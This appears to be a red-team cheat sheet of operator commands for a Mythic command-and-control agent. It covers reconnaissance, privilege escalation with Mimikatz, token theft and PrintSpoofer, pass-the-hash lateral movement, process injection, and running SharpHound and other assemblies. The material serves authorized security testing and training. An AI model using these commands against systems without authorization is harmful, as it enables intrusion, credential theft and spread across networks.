Page cover

Mythic

Beacon Management (Real-Time C2 Control)

# Set agent to real-time communication (no sleep)
Mythic > sleep 0 0

# Instruct agent to exit
Mythic > exit

# List all running jobs
Mythic > jobs

# Kill a specific job
Mythic > jobkill [jid]

# Load additional commands into agent
Mythic > load command1 command2 ...

# Link to a peer-to-peer (SMB/TCP) agent
Mythic > link

# Unlink a linked agent
Mythic > unlink

Information Gathering / Recon

# List network interfaces and IP addresses
Mythic > ifconfig

# List running processes
Mythic > ps

# List directory contents
Mythic > ls -Path [path]

# Print current working directory
Mythic > pwd

# Display domain controllers
Mythic > net_dclist [domain.local]

# List shares on a remote machine
Mythic > net_shares -Computer [hostname]

# Show local groups on a machine
Mythic > net_localgroup [hostname]

# Show members of a local group
Mythic > net_localgroup_member -Group [groupname] -Computer [hostname]

# View network connections
Mythic > netstat -Tcp -Udp

# Take a screenshot
Mythic > screenshot

Privilege Escalation

# Attempt to enable all possible privileges
Mythic > getprivs

# Use Mimikatz directly
Mythic > mimikatz -Command "privilege::debug"

# Steal token from a PID
Mythic > steal_token [pid]

# Impersonate a user with credentials
Mythic > make_token -username [user] -password [pass]

# PrintSpoofer to escalate to SYSTEM
Mythic > printspoofer -Command "cmd.exe"

# Revert to original token
Mythic > rev2self

Lateral Movement

# Use Pass-the-Hash to run commands
Mythic > pth -Domain [domain] -User [user] -NTLM [hash] -Run [cmd.exe]

# Copy file to remote system
Mythic > cp -Path [source] -Destination [dest]

# List services or manipulate them
Mythic > sc -Query -Computer [host]

# Use PowerShell remoting (if applicable)
Mythic > powershell -Command "Invoke-Command ..."

Post-Exploitation / Execution

# Run shell command
Mythic > shell whoami

# Run PowerShell in current process
Mythic > powershell -Command "Get-Process"

# Import PowerShell script
Mythic > powershell_import

# Inject PowerShell into a specific process
Mythic > psinject -PID [pid] -Command "..."

# Execute .NET assembly
Mythic > execute_assembly -Assembly SharpHound.exe -Arguments "-c all --zipfilename mythical"

# Register .NET assembly
Mythic > register_assembly

# Execute inline .NET assembly
Mythic > inline_assembly -Assembly [Assembly.exe] -Arguments "..."

# Execute unmanaged PE
Mythic > execute_pe -PE [binary.exe] -Arguments "..."

# Execute Beacon Object File (BOF)
Mythic > execute_coff -Coff [file.o] -Function [go]

File Transfer

# Upload a file
Mythic > upload

# Download a file
Mythic > download -Path [path]

# Remove a file
Mythic > rm -Path [path]

Last updated